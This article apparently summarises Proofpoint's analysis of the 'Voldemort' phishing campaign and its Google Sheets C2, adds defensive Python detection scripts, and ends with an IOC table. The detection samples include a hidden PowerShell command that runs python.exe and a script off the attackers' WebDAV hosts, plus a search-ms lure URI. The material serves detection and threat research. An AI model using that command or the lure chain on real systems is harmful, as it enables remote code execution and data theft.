Proofpoint researchers have uncovered a cyberattack campaign, “Voldemort,” that uses Google Sheets as its command-and-control (C2) platform. Targeting Windows users, the campaign chains widely used techniques (search-ms lures, WebDAV-hosted payloads, DLL side-loading) with a rarely seen one (Sheets-based C2) to deliver custom malware whose traffic blends in with legitimate Google API use.
Voldemort Campaign
Proofpoint researchers discovered an unusual attack campaign that uses Google Sheets for C2 operations. The custom backdoor, dubbed “Voldemort,” is written in C and can gather system information and deploy additional payloads. The combination of common intrusion techniques with an uncommon C2 channel makes the campaign stand out in the threat landscape.
The campaign, starting on August 5, 2024, sent over 20,000 malicious emails to more than 70 organizations globally.
Threat actors impersonated tax authorities from countries like the U.S., UK, France, and others, using compromised domains to make the phishing attempts appear more authentic.
The emails linked to a landing page hosted on InfinityFree. Clicking “View Document” ran a check for a Windows browser; Windows victims were then redirected to a search-ms: URI served through a TryCloudflare tunnel, which opens Windows Explorer on a remote WebDAV share. Because Explorer presents the share's contents like the results of a local search, the attacker's LNK file appears to be a locally stored PDF, encouraging the user to open it.
The Voldemort campaign abuses the Windows search protocol handler (search-ms:) to make remote files appear local. This method, frequently used to deliver RATs, is gaining popularity among cybercriminals; the campaign also uses the saved-search file format (.search-ms) to further disguise the malicious action.
Execution and Payload Delivery
If the victim opens the malicious LNK file, it runs a PowerShell command that launches Python.exe from another WebDAV share, executing a Python script that collects system information and sends it to the attacker (the IOC table below lists the pingb.in base URL used for this).
The script then downloads a decoy PDF and a password-protected ZIP (served under an image file name), extracts the archive, and runs the legitimate CiscoCollabHost.exe it contains. That executable is vulnerable to DLL hijacking and side-loads the malicious CiscoSparkLauncher.dll placed beside it, which is the Voldemort backdoor itself.
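As an added example (not part of Proofpoint's report and not the campaign's own code), the following Python triage checks cover the two stages above: the first breaks a search-ms: URI into its parameters and classifies where its location crumb points (a UNC or http(s) path there makes Explorer mount a remote share and show it as if it were local), the second flags a process command line in which PowerShell launches python.exe from a WebDAV (DavWWWRoot) share. The sample URI and command line are constructed for illustration; only the TryCloudflare hostnames come from the IOC table, the share paths and script name are assumptions.

```python
"""Triage checks for the search-ms -> WebDAV -> LNK -> python.exe chain.

Added example; sample inputs are constructed. The tunnel hostnames come
from the IOC table, the share paths and script name are assumptions.
"""
import re
from urllib.parse import unquote, urlsplit

TUNNEL_SUFFIX = ".trycloudflare.com"

# Host part of a UNC path; the WebDAV mini-redirector form is
# \\host[@SSL][@port]\DavWWWRoot\... so stop at the first '@' or '\'.
UNC_HOST_RE = re.compile(r"^\\\\([^\\@]+)")

# python.exe / pythonw.exe given as a path on a DavWWWRoot share.
WEBDAV_PYTHON_RE = re.compile(
    r"(\\\\[^\s\\]+\\DavWWWRoot\\\S*?pythonw?\.exe)", re.IGNORECASE)


def parse_search_ms(uri: str) -> dict:
    """Split a search-ms: URI into parameters and classify its location crumb."""
    if not uri.lower().startswith("search-ms:"):
        raise ValueError("not a search-ms URI")
    params: dict = {"crumbs": []}
    for part in uri[len("search-ms:"):].split("&"):
        key, _, value = part.partition("=")
        value = unquote(value)
        if key.lower() == "crumb":           # several crumb= parameters are allowed
            params["crumbs"].append(value)
        else:
            params[key.lower()] = value

    location = next((c[len("location:"):] for c in params["crumbs"]
                     if c.lower().startswith("location:")), None)
    remote, host = False, None
    if location:
        m = UNC_HOST_RE.match(location)
        if m:                                 # UNC path, e.g. \\host@SSL\DavWWWRoot\...
            remote, host = True, m.group(1).lower()
        elif location.lower().startswith(("http://", "https://")):
            remote, host = True, (urlsplit(location).hostname or "").lower()
    return {
        "display_name": params.get("displayname"),  # what the user sees in Explorer
        "location": location,
        "remote": remote,
        "host": host,
        "tunnel": bool(host and host.endswith(TUNNEL_SUFFIX)),
    }


def flag_webdav_python_launch(cmdline: str) -> dict:
    """Flag a command line that runs python.exe straight off a WebDAV share."""
    m = WEBDAV_PYTHON_RE.search(cmdline)
    if not m:
        return {"suspicious": False}
    host = UNC_HOST_RE.match(m.group(1)).group(1).lower()
    return {
        "suspicious": True,
        "via_powershell": "powershell" in cmdline.lower(),
        "python_path": m.group(1),
        "host": host,
        "tunnel": host.endswith(TUNNEL_SUFFIX),
    }


# Constructed samples: hostnames from the IOC table, everything else assumed.
LURE_URI = (r"search-ms:query=IRS_P966&crumb=location:"
            r"\\pants-graphs-optics-worse.trycloudflare.com@SSL\DavWWWRoot\library"
            r"&displayname=Downloads")
BENIGN_URI = (r"search-ms:query=report&crumb=location:C:\Users\alice\Documents"
              r"&displayname=Documents")
LNK_CMDLINE = (r'powershell.exe -w hidden -c "'
               r'\\ways-sms-pmc-shareholders.trycloudflare.com@SSL\DavWWWRoot\library\python.exe '
               r'\\ways-sms-pmc-shareholders.trycloudflare.com@SSL\DavWWWRoot\library\sysinfo.py"')

if __name__ == "__main__":
    for uri in (LURE_URI, BENIGN_URI):
        print(parse_search_ms(uri))
    print(flag_webdav_python_launch(LNK_CMDLINE))
```

Both checks are cheap enough to run over URL-click telemetry and process-creation events (Sysmon Event ID 1 command lines); a local `crumb=location:` is normal, a remote one, above all on a tunnel hostname, is the lure described in the text.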
The Use of Google Sheets for Command and Control
Instead of relying on its own or compromised servers, the Voldemort malware uses Google Sheets for command and control (C2), data exfiltration, and command execution. It authenticates to the Google Sheets API with an embedded client token, then reads commands from and writes results to a spreadsheet, turning the sheet into a two-way channel with the attackers. It supports a range of file and system operations and reports status back to the sheet, including the malware's own name, “Voldemort.”
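Because sheets.googleapis.com is legitimate and busy, blocking or alerting on the host alone is not an option; the useful signals are which process talks to it, which spreadsheet it touches, and how regularly. As an added example (not Proofpoint's tooling and not the malware), the Python below runs those three checks over constructed telemetry standing in for EDR or Sysmon network events joined with proxy URL logs. The event field names, the browser allowlist, the timestamps and the drop directory are assumptions; the spreadsheet ID and the CiscoCollabHost.exe process name come from the IOC table.

```python
"""Hunt for Google Sheets API traffic that looks like Voldemort-style C2.

Added example with constructed telemetry. Field names (host, image, url, ts)
and the allowlist are assumptions; the spreadsheet ID and process name come
from the IOC table.
"""
import re
from itertools import groupby
from urllib.parse import urlsplit

KNOWN_BAD_SHEETS = {"16JvcER-0TVQDimWV56syk91IMCYXOvZbW4GTnb947eE"}  # IOC table
# Processes for which Sheets API traffic is expected (assumed; tune per fleet).
EXPECTED_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "googledrivefs.exe"}
SHEET_ID_RE = re.compile(r"^/v4/spreadsheets/([A-Za-z0-9_-]+)")
BEACON_MIN_EVENTS = 4   # minimum requests before calling it polling
BEACON_JITTER_S = 5     # allowed spread between consecutive intervals


def sheet_id_from_url(url: str):
    """Return the spreadsheet ID for a Sheets API v4 URL, else None."""
    parts = urlsplit(url)
    if parts.hostname != "sheets.googleapis.com":
        return None
    m = SHEET_ID_RE.match(parts.path)
    return m.group(1) if m else None


def classify(event: dict):
    """Per-event reasons: known-bad sheet, or a process that should not use the API."""
    sid = sheet_id_from_url(event["url"])
    if sid is None:
        return None
    image = event["image"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if sid in KNOWN_BAD_SHEETS:
        reasons.append("known-bad spreadsheet id")
    if image not in EXPECTED_IMAGES:
        reasons.append(f"non-browser process {image}")
    return {"host": event["host"], "image": image, "sheet_id": sid,
            "ts": event["ts"], "reasons": reasons}


def regular_polling(timestamps) -> bool:
    """True if the same sheet is re-read at a near-constant interval (beacon-like)."""
    ts = sorted(timestamps)
    if len(ts) < BEACON_MIN_EVENTS:
        return False
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    return max(gaps) - min(gaps) <= BEACON_JITTER_S


def find_suspicious(events):
    """One finding per (host, process, sheet) with every reason collected."""
    key = lambda r: (r["host"], r["image"], r["sheet_id"])
    rows = sorted((c for c in map(classify, events) if c), key=key)
    findings = []
    for (host, image, sid), grp in groupby(rows, key=key):
        grp = list(grp)
        reasons = sorted({r for g in grp for r in g["reasons"]})
        if regular_polling([g["ts"] for g in grp]):
            reasons.append(f"regular polling ({len(grp)} requests)")
        if reasons:
            findings.append({"host": host, "image": image, "sheet_id": sid,
                             "reasons": reasons})
    return findings


# Constructed telemetry: the side-loading host process polling the known-bad
# sheet once a minute, plus ordinary browser use of a different sheet.
BAD_URL = ("https://sheets.googleapis.com:443/v4/spreadsheets/"
           "16JvcER-0TVQDimWV56syk91IMCYXOvZbW4GTnb947eE/values/Sheet1")
EVENTS = [
    {"host": "WS-042", "image": r"C:\Users\alice\AppData\Local\Temp\CiscoCollabHost.exe",
     "url": BAD_URL, "ts": 1723000000 + 60 * i} for i in range(5)
] + [
    {"host": "WS-042", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "url": "https://sheets.googleapis.com/v4/spreadsheets/1aBcD_eFgH/values/Budget",
     "ts": 1723000030},
    {"host": "WS-042", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "url": "https://docs.google.com/spreadsheets/d/1aBcD_eFgH/edit", "ts": 1723000040},
]

if __name__ == "__main__":
    for finding in find_suspicious(EVENTS):
        print(finding)
```

The IOC match only catches this campaign's sheet; the process and polling checks are what generalise to the next actor who picks a fresh spreadsheet, at the cost of tuning the allowlist for legitimate non-browser API clients in your environment.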
Implications and Risks
Proofpoint assesses with moderate confidence that the Voldemort campaign is run by an advanced persistent threat (APT) actor focused on intelligence gathering. Its high message volume and broad targeting are, however, more typical of cybercrime, so the campaign looks like a mix of espionage tradecraft and crimeware-style distribution.
Using cloud services such as Google Sheets for C2 reflects a troubling trend: traffic to legitimate, widely used infrastructure blends in with normal activity, which complicates detection and response.
The Voldemort campaign shows an advanced use of cloud services in cyberattacks. As threats evolve, defenders must account for how legitimate tools can be misused and build detections around process behaviour rather than destination alone.
Indicators of compromise
| Indicator | Description | First Observed |
|---|---|---|
| hxxps://pubs[.]infinityfreeapp[.]com/SA150_Notes_2024[.]html | Redirect Target / Landing Page | 2024-08-12 |
| hxxps://pubs[.]infinityfreeapp[.]com/IRS_P966[.]html | Redirect Target / Landing Page | 2024-08-06 |
| hxxps://pubs[.]infinityfreeapp[.]com/Notice_pour_remplir_la_N%C2%B0_2044[.]html | Redirect Target / Landing Page | 2024-08-13 |
| hxxps://pubs[.]infinityfreeapp[.]com/La_dichiarazione_precompilata_2024[.]html | Redirect Target / Landing Page | 2024-08-05 |
| hxxps://pubs[.]infinityfreeapp[.]com/Steuerratgeber[.]html | Redirect Target / Landing Page | 2024-08-13 |
| hxxps://od[.]lk/s/OTRfNzQ5NjQwOTJf/test[.]png | Python Payload (Renamed ZIP containing Voldemort) | 2024-08-05 |
| hxxps://od[.]lk/s/OTRfODQ1Njk2ODVf/2044_4765[.]pdf | Python Payload (Decoy PDF) | 2024-08-05 |
| hxxps://od[.]lk/s/OTRfODM5Mzc3NjFf/irs-p966[.]pdf | Python Payload (Decoy PDF) | 2024-08-06 |
| hxxps://od[.]lk/s/OTRfODM3MjM2NzVf/La_dichiarazione_precompilata_2024[.]pdf | Python Payload (Decoy PDF) | 2024-08-05 |
| hxxps://od[.]lk/s/OTRfODQ1NDc2MjZf/SA150_Notes_2024[.]pdf | Python Payload (Decoy PDF) | 2024-08-12 |
| hxxps://od[.]lk/s/OTRfODQ1NzA0Mjlf/einzelfragen_steuerbescheinigungen_de[.]pdf | Python Payload (Decoy PDF) | 2024-08-13 |
| hxxp://83[.]147[.]243[.]18/p/ | pingb.in base URL | 2024-08-05 |
| 3fce52d29d40daf60e582b8054e5a6227a55370bed83c662a8ff2857b55f4cea | test.png/zip SHA256 | 2024-08-05 |
| 561e15a46f474255fda693afd644c8674912df495bada726dbe7565eae2284fb | CiscoSparkLauncher.dll SHA256 (Voldemort Malware) | 2024-08-05 |
| 6bdd51dfa47d1a960459019a960950d3415f0f276a740017301735b858019728 | CiscoCollabHost.exe SHA256 (Benign file used for side-loading) | 2024-08-05 |
| pants-graphs-optics-worse[.]trycloudflare[.]com | TryCloudflare Tunnel Hostname | 2024-08-05 |
| ways-sms-pmc-shareholders[.]trycloudflare[.]com | TryCloudflare Tunnel Hostname | 2024-08-05 |
| recall-addressed-who-collector[.]trycloudflare[.]com | TryCloudflare Tunnel Hostname | 2024-08-05 |
| hxxps://sheets[.]googleapis[.]com:443/v4/spreadsheets/16JvcER-0TVQDimWV56syk91IMCYXOvZbW4GTnb947eE/ | Voldemort C2 | 2024-08-05 |
| hxxps://resource[.]infinityfreeapp[.]com/ABC_of_Tax[.]html | Redirect Target / Landing Page | 2024-08-19 |
| hxxps://resource[.]infinityfreeapp[.]com/0023012-317[.]html | Redirect Target / Landing Page | 2024-08-19 |
| hxxps://od[.]lk/s/OTRfODQ4ODE4OThf/logo[.]png | Python Payload (Renamed ZIP containing Voldemort) | 2024-08-19 |
| hxxps://od[.]lk/s/OTRfODQ5MzQ5Mzlf/ABC_of_Tax[.]pdf | Python Payload (Decoy PDF) | 2024-08-19 |
| 0b3235db7e8154dd1b23c3bed96b6126d73d24769af634825d400d3d4fe8ddb9 | logo.png/zip SHA256 | 2024-08-19 |
| fa383eac2bf9ad3ef889e6118a28aa57a8a8e6b5224ecdf78dcffc5225ee4e1f | CiscoSparkLauncher.dll SHA256 (Voldemort Malware) | 2024-08-19 |
| invasion-prisoners-inns-aging[.]trycloudflare[.]com | TryCloudflare Tunnel Hostname | 2024-08-19 |